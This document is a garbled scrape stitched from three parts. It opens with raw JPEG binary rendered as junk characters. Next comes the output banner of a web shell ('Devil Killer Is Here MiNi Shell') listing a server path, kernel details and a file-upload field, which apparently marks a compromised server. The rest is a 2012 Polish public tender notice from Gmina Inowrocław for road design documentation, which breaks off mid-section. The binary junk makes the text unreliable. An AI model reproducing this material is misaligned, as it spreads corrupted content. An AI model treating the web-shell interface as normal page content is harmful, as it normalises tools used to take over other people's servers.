JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121022/224349-N-2012.html

<p class="kh_header"><b>Inowrocław: Opracowanie dokumentacji projektowo - kosztorysowej związanej z realizacją zadania - modernizacja drogi gminnej nr 150516C Jacewo - Balin - Etap II</b><br>
<b>Numer ogłoszenia: 224349 - 2012; data zamieszczenia: 22.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Inowrocław , ul. Królowej Jadwigi 43, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3570251, faks 52 3540490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inowroclaw.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej związanej z realizacją zadania - modernizacja drogi gminnej nr 150516C Jacewo - Balin - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej związanej z realizacją zadania polegającego na wykonaniu drugiego etapu robót drogowych związanych z modernizacją drogi gminnej nr 150516C Jacewo - Balin - Etap II, na odcinku od km 0+500,00 km do 1+280,00 km. 
Pas drogowy zlokalizowany jest na działkach nr 80, 79, 29 obręb Jacewo. Inwestycja drogowa polega na kontynuacji robót związanych z modernizacją nawierzchni drogi gminnej nr 150516C w m. Jacewo. Pierwszy etap, zakończony w roku 2009, objął swoim zasięgiem przebudowę przedmiotowej drogi na odcinku od km 0+000,00 do 0+500,00 km.  

W stanie istniejącym w pasie drogowym znajduje się jezdnia o nawierzchni tłuczniowo - żużlowej, szerokości 5 m., z obustronnymi poboczami o szerokości 1,0 - 2,0 m. Miejscami z obustronnym zadrzewieniem w koronie drogi. Odwodnienie drogi do istniejącego rowu, stanowiącego lewe pobocze drogi na odcinku od 0+500,00 km do 0+950,00 km. Na pozostałym odcinku rów został zasypany.  

Celem opracowania projektu budowlano - wykonawczego jest modernizacja odcinka drogi gminnej nr 150516C od km 0+500,00 km do 1+280,00 km.

Wymagane parametry techniczne drogi:
- klasa drogi - L
- kategoria ruchu - KR 1
- prędkość projektowa - 40 km/h
- szerokość jezdni - 5 m
- szerokość poboczy - 1 - 2m

Zakres przeznaczonej do wykonania dokumentacji projektowo - kosztorysowej obejmuje:

-  wykonanie map sytuacyjno-wysokościowych do celów projektowania dróg w skali 1 : 500;
-  uzyskanie informacji terenowo-prawnej;
-  dokonanie uzgodnień branżowych: m. in. uzgodnienie z RE Inowrocław, 
    Telekomunikacją Polską S.A., Gminnym Zakładem Komunalnym, Zakładem   
    Gazowniczym, itp.
-  uzyskanie opinii Powiatowego Zespołu Uzgadniania Dokumentacji Projektowych, 
-  uzyskanie decyzji o Zezwoleniu na realizację inwestycji drogowej, 

Całość dokumentacji należy sporządzić w oparciu o obwiązujące przepisy prawa, warunki techniczne.

Jednostka Projektująca zobowiązana jest do :

uzgodnienia - przed przystąpieniem do prac projektowych - z Zamawiającym szczegółów rozwiązań projektowych i innych związanych z planowaną inwestycją 
wykonania pomiarów uzupełniających dla celów projektowych 
zastabilizowania punktów głównych trasy 
wykonanie opracowań geodezyjnych w oparciu o współrzędne państwowe 
Opracowanie winno składać się z:
1. Dokumentacji służącej do opisu przedmiotu zamówienia na roboty budowlane, w postaci:
a) projektu budowlano - wykonawczego, 
b) specyfikacji technicznych wykonania i odbioru robót budowlanych.
2. Dokumentacji służącej do określenia wartości zamówienia na roboty budowlane, w postaci:
a) kosztorysu inwestorskiego,
b) przedmiaru robót.

Ww. opracowania należy przygotować w wersji papierowej i w wersji elektronicznej. 
Szczegółowe wymagania dotyczące poszczególnych części opracowania zawarte zostały poniżej.

1. Dokumentacja służąca do opisu przedmiotu zamówienia na roboty budowlane

a) projekt budowlano - wykonawczy:
Dokumentacja służąca do opisu przedmiotu zamówienia na wykonanie wyżej
wymienionych robót budowlanych winna być sporządzona zgodnie z postanowieniami
rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202.poz. 2072 z późn. zm.).
Zgodnie z postanowieniami cytowanego wyżej rozporządzenia, projekt budowlano - wykonawczy powinien zawierać plany, rysunki i inne dokumenty umożliwiające jednoznaczne określenie rodzaju i zakresu robót budowlanych, podstawowych oraz uwarunkowań i dokładnej lokalizacji ich wykonywania. Opis przedmiotu zamówienia zawarty w projekcie budowlano - wykonawczym powinien być sporządzony w sposób umożliwiający przygotowanie oferty przez wykonawcę i realizację robót budowlanych.
Projekt musi zawierać rysunki w skali uwzględniającej specyfikę zamawianych robót wraz wyjaśnieniami opisowymi, które dotyczą informacji o podziale obiektu na części, wymagań w zakresie rozwiązań budowlano - konstrukcyjnych i materiałowych, detali architektonicznych i urządzeń budowlanych oraz instalacji i wyposażenia technicznego.
Przy sporządzaniu dokumentacji projektowej należy wziąć pod uwagę postanowienia
art. 29 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), zgodnie z którymi przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i projektant nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny.
W przypadku dopuszczenia składania ofert równoważnych projektant jest zobowiązany do dokładnego określenia wymagań dotyczących takich ofert. W opisie przedmiotu zamówienia powinny znaleźć się określenia precyzujące wymogi projektanta w odniesieniu do dopuszczanego przez niego zakresu równoważności oferty.  Strona tytułowa dokumentacji projektowej powinna  zawierać w szczególności :
1) nazwę nadaną zamówieniu przez zamawiającego;
2) adres obiektu budowlanego, którego dotyczy dokumentacja projektowa;
3) w zależności od zakresu robót budowlanych objętych przedmiotem zamówienia - nazwy i kody :
a) grup robót,
b) klas robót,
c) kategorii robót;
4) nazwę i adres zamawiającego;
5) spis zawartości dokumentacji projektowej;
6) nazwę i adres podmiotu wraz z imionami i nazwiskami osób opracowujących części
składowe dokumentacji projektowej oraz datę opracowania.
Projekt musi zawierać informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ), która zostanie uwzględniona przez kierownika budowy w planie bezpieczeństwa i ochrony zdrowia. Informacja winna uwzględniać warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120, poz. 1126).
b) specyfikacja techniczna wykonania i odbioru robót budowlanych:
Specyfikacje techniczne wykonania i odbioru robót budowlanych stanowią opracowania
zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu
i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości
wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót.

Specyfikacje techniczne wykonania i odbioru robót budowlanych winny zawierać co najmniej:
1) część ogólną, która powinna obejmować:
a) nazwę nadaną zamówieniu przez zamawiającego,
b) przedmiot i zakres robót budowlanych,
c) wyszczególnienie i opis prac towarzyszących i robót tymczasowych,
d) informacje o terenie budowy zawierające wszystkie niezbędne dane istotne z punktu
widzenia:
- organizacji robót budowlanych,
- zabezpieczenia interesów osób trzecich,
- ochrony środowiska,
- warunków bezpieczeństwa pracy,
- zaplecza dla potrzeb wykonawcy,
- warunków dotyczących organizacji ruchu,
- ogrodzenia,
- zabezpieczenia chodników i jezdni,
e) w zależności od zakresu robót budowlanych objętych przedmiotem zamówienia
- nazwy i kody :
- grup robót,
- klas robót,
- kategorii robót,
f) określenia podstawowe, zawierające definicje pojęć i określeń nigdzie wcześniej
niezdefiniowanych, a wymagających zdefiniowania w celu jednoznacznego
rozumienia zapisów dokumentacji projektowej i specyfikacji technicznej wykonania
i odbioru robót budowlanych;
2) wymagania dotyczące właściwości wyrobów budowlanych oraz niezbędne wymagania
związane z ich przechowywaniem, transportem, warunkami dostawy, składowaniem
i kontrolą jakości - poszczególne wymagania odnosi się do postanowień norm;
3) wymagania dotyczące sprzętu i maszyn niezbędnych lub zalecanych do wykonania robót
budowlanych zgodnie z założoną jakością;
4) wymagania dotyczące środków transportu;
5) wymagania dotyczące wykonania robót budowlanych z podaniem sposobu wykończenia
poszczególnych elementów, tolerancji wymiarowych, szczegółów technologicznych oraz
niezbędne informacje dotycząc odcinków robót budowlanych, przerw i ograniczeń
a także wymagania specjalne;
6) opis działań związanych z kontrolą, badaniami oraz odbiorem wyrobów i robót
budowlanych w nawiązaniu do dokumentów odniesienia;
7) wymagania dotyczące przedmiaru i obmiaru robót;
8) opis sposobu odbioru robót budowlanych;
9) opis sposobu rozliczenia robót tymczasowych i prac towarzyszących;
10) dokumenty odniesienia - dokumenty będące podstawą do wykonania robót budowlanych,
w tym wszystkie elementy dokumentacji projektowej, normy, aprobaty techniczne oraz
inne dokumenty i ustalenia techniczne.
Prace towarzyszące są to prace niezbędne do wykonania robót podstawowych niezaliczane
do robót tymczasowych, w tym geodezyjne wytyczanie i inwentaryzacja powykonawcza.

2. Dokumentacja służąca do określenia wartości zamówienia na roboty budowlane:
a) kosztorys inwestorski:
Metody i podstawy sporządzania kosztorysu inwestorskiego określa rozporządzenie Ministra
Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania
kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz
planowanych kosztów robót budowlanych określonych w programie funkcjonalno -
użytkowym (Dz. U. Nr 130, poz. 1389).
Stosownie do postanowień § 2 cytowanego rozporządzenia kosztorys inwestorski opracowuje
się metodą kalkulacji uproszczonej, polegającą na obliczeniu wartości kosztorysowej robót
objętych przedmiarem robót jako sumy iloczynów ilości jednostek przedmiarowych robót
podstawowych i ich cen jednostkowych bez podatku od towarów i usług.
Wartość kosztorysowa robót obejmuje wartość wszystkich materiałów, urządzeń i konstrukcji
potrzebnych do zrealizowania przedmiotu zamówienia.
Podstawę do sporządzania kosztorysu inwestorskiego stanowią:
1. dokumentacja projektowa;
2. specyfikacja techniczna wykonania i odbioru robót budowlanych;
3. założenia wyjściowe do kosztorysowania;
4. ceny jednostkowe robót podstawowych.

Przy ustalaniu cen jednostkowych robót należy stosować w kolejności:
1. ceny jednostkowe robót określone na podstawie danych rynkowych, w tym danych
z zawartych wcześniej umów lub powszechnie stosowanych, aktualnych publikacji;
2. kalkulacje szczegółowe ceny jednostkowej, polegające na określeniu wartości poszczególnych
jednostkowych nakładów rzeczowych (kosztów bezpośrednich) oraz doliczeniu narzutów
kosztów pośrednich i zysku.

Kosztorys inwestorski obejmuje:
1) stronę tytułową zawierającą:
a) nazwę obiektu lub robót budowlanych z uwzględnieniem nazw i kodów Wspólnego
Słownika Zamówień i podaniem lokalizacji;
b) nazwę i adres zamawiającego;
c) nazwę i adres jednostki opracowującej kosztorys;
d) imiona i nazwiska, z określeniem funkcji osób opracowujących kosztorys, a także ich
podpisy,
e) wartość kosztorysową robót;
f) datę opracowania kosztorysu inwestorskiego.
2) ogólną charakterystykę obiektu lub robót, zawierającą krótki opis techniczny wraz
z istotnymi parametrami, które określają wielkość obiektu lub robót;
3) przedmiar robót;
4) kalkulację uproszczoną;
5) tabelę wartości elementów scalonych, sporządzoną w postaci sumarycznego zestawienia
wartości robót określonych przedmiarem robót, łącznie z narzutami kosztów pośrednich
i zysku, odniesionych do elementu obiektu lub zbiorczych rodzajów robót;
6) załączniki:
a) założenia wyjściowe do kosztorysowania;
b) kalkulacje szczegółowe cen jednostkowych, analizy indywidualne nakładów
rzeczowych oraz analizy własne cen czynników produkcji i wskaźników narzutów
kosztów pośrednich i zysku.

b) przedmiar robót:
Stosownie do postanowień § 1 ust. 2 pkt 6 rozporządzenia Ministra Infrastruktury z dnia
18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu
inwestorskiego, obliczania planowanych kosztów prac projektowych praz planowanych
kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U.
Nr 130, poz. 1389) przez przedmiar robót służący do określenia wartości zamówienia na
roboty budowlane, należy rozumieć opracowanie zawierające zestawienie przewidywanych
do wykonania robót w kolejności technologicznej ich wykonania wraz z ich szczegółowym
opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis,
z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem
podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych.

Przedmiar robót musi składać się z:
1) karty tytułowej;
2) spisu działów przedmiaru robót;
3) tabeli przedmiaru robót.

Karta tytułowa przedmiaru robót musi zawierać następujące informacje:
1) nazwę nadaną zamówieniu przez zamawiającego;
2) w zależności od zakresu robót budowlanych objętych przedmiotem zamówienia nazwy
i kody :
a) grup robót,
b) klas robót,
c) kategorii robót;
3) adres obiektu budowlanego;
4) nazwę i adres zamawiającego;
5) datę opracowania przedmiaru robót.

Spis działów przedmiaru robót powinien przedstawiać podział wszystkich robót budowlanych
w danym obiekcie na grupy robót według Wspólnego Słownika Zamówień.
Podział przedmiaru robót należy opracować według systematyki ustalonej indywidualnie
lub na podstawie systematyki stosowanej w publikacjach zawierających kosztorysowe normy
nakładów rzeczowych.
W przypadku robót budowlanych dotyczących wielu obiektów, spisem działów należy
objąć dodatkowo podział całej inwestycji na obiekty budowlane. Grupa robót dotycząca
przygotowania terenu powinna stanowić odrębny dział przedmiaru dla wszystkich obiektów.
Tabele przedmiaru robót powinny zawierać pozycje przedmiarowe odpowiadające
robotom podstawowym. W tabelach przedmiaru robót nie uwzględnia się robót tymczasowych - robót, które są projektowane i wykonywane jako potrzebne do wykonania robót podstawowych, ale nie są przekazywane zamawiającemu i są usuwane po wykonaniu robót podstawowych,
z wyłączeniem przypadków, gdy istnieją uzasadnione podstawy do ich odrębnego rozliczania.

Dla każdej pozycji przedmiaru robót należy podać następujące informacje:
1) numer pozycji przedmiaru;
2) kod pozycji przedmiaru, określony zgodnie z ustaloną indywidualnie systematyką
robót lub na podstawie wskazanych publikacji zawierających kosztorysowe normy
nakładów rzeczowych;
3) numer specyfikacji technicznej wykonania i odbioru robót budowlanych,
zawierającej wymagania dla danej pozycji przedmiaru;
4) nazwę i opis pozycji przedmiaru oraz obliczenia ilości jednostek miary dla pozycji
przedmiarowej;
5) jednostkę miary, której dotyczy pozycja przedmiaru;
6) ilość jednostek miary pozycji przedmiaru.

Ilości jednostek miary podane w przedmiarze powinny być wyliczone na podstawie rysunków
w dokumentacji projektowej, wyłącznie w sposób zgodny z zasadami podanymi w specyfikacjach technicznych wykonania i odbioru robót budowlanych.

Inne dodatkowe obowiązki Projektanta:
1. Dokumentację niezbędną do uzyskania wszelkich opinii, uzgodnień i pozwoleń
wymaganych przepisami dostarcza Projektant na swój koszt. Czynności te Projektant
wykonuje w imieniu Zamawiającego.
2. Wykonawca jest odpowiedzialny wobec Zamawiającego z tytułu rękojmi za wady
w przedmiocie umowy przez okres 24 miesięcy. Okres rękojmi rozpoczyna się z dniem
uprawomocnienia się decyzji o pozwoleniu na budowę/zgłoszenia robót nie wymagających pozwolenia na budowę.
3. Wykonawca zobowiązuje się dostarczyć dokumentację w następującej liczbie egzemplarzy:
1) projekt budowlano - wykonawczy- 5 egz.,
2) specyfikacja techniczna wykonania i odbioru robót - 3 egz.,
3) kosztorys inwestorski - 3 egz.,
4) przedmiar robót - 3 egz.
4. Dokumentacja projektowa powinna być również dostarczona w wersji elektronicznej
(CD-ROM) sporządzonej w formacie PDF, a w przypadku kosztorysu inwestorskiego
i przedmiaru robót dodatkowo w formacie ATH..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ.
Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie wcześniej minimum trzech projektów budowlano - wykonawczych odpowiadających swoim charakterem użytkowym przedmiotowi zamówienia, czyli w zakresie budowy lub modernizacji dróg o łącznej wartości (trzech projektów) co najmniej 200.000,00 zł, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane poprawnie i prawidłowo ukończone.
Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VIII. ppkt 1.2. SIWZ - wypełniając załącznik nr 3.
Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest oświadczenie o dysponowaniu niezbędnym sprzętem technicznym i narzędziami do wykonania zadania;

- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VIII. ppkt 1.3. SIWZ - wypełniając załącznik nr 4.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest oświadczenie o dysponowaniu osobami zdolnymi do wykonywania zamówienia tj. osobami posiadającymi wymagane uprawnienia do wykonywania zamówienia. 

- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VIII. ppkt 1.4. SIWZ - wypełniając załącznik nr 5.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.
Spełnieniem tego warunku jest dysponowanie osobami zdolnymi do wykonania zamówienia tj. osobami posiadającymi wymagane uprawnienia do wykonywania zamówienia, gwarantującymi poprawne wykonanie zamówienia, w postaci wykazania minimum dwóch osób, posiadających wymagane uprawnienia, w tym:

Projektant (branża drogowa) - 1 osoba - 
- uprawnienia budowlane do projektowania w specjalności drogowej
- doświadczenie: - staż pracy co najmniej 3 lata od dnia uzyskania uprawnień oraz 5-letni staż pracy

Wykaz osób stanowi załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ., oraz 
- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

